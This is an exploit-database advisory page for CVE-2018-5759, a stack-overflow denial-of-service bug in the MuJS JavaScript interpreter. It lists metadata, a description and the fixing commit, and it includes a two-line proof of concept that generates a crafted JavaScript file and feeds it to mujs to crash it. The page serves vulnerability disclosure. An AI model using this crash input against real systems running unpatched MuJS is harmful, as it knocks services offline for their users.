header-logo
Suggest Exploit
vendor:
Mujs
by:
Andrea Sindoni
5.5
CVSS
MEDIUM
Denial of Service (DoS)
119
CWE
Product Name: Mujs
Affected Version From: Mujs - 228719d087aa5e27dcd8627c4acf7273476bdbca
Affected Version To: Mujs - 228719d087aa5e27dcd8627c4acf7273476bdbca
Patch Exists: YES
Related CWE: CVE-2018-5759
CPE: a:artifex:mujs
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Linux
2018

DoS caused by the interactive call between two functions

A Denial of Service (DoS) vulnerability was discovered in Mujs, a lightweight Javascript interpreter, due to an interactive call between two functions. An attacker can exploit this vulnerability by sending a specially crafted JavaScript file to the interpreter, causing a stack overflow and resulting in a DoS condition. The vulnerability was fixed in commit 4d45a96e57fbabf00a7378b337d0ddcace6f38c1.

Mitigation:

The vulnerability was fixed in commit 4d45a96e57fbabf00a7378b337d0ddcace6f38c1.
Source

Exploit-DB raw data:

# Exploit Title: DoS caused by the interactive call between two functions
# Date: 2018-01-16
# Exploit Author: Andrea Sindoni - @invictus1306
# Vendor: Artifex (https://www.artifex.com/)
# Software Link: https://github.com/ccxvii/mujs
# Version: Mujs - 228719d087aa5e27dcd8627c4acf7273476bdbca
# Tested on: Linux
# CVE : CVE-2018-5759

Simple poc:
# python -c "print 'func%d'*80000" > poc.js
# mujs poc.js

Fixed in commit 4d45a96e57fbabf00a7378b337d0ddcace6f38c1 (
http://git.ghostscript.com/?p=mujs.git;a=commit;h=4d45a96e57fbabf00a7378b337d0ddcace6f38c1
)

Navigation

Suggest Exploit

Services By CQR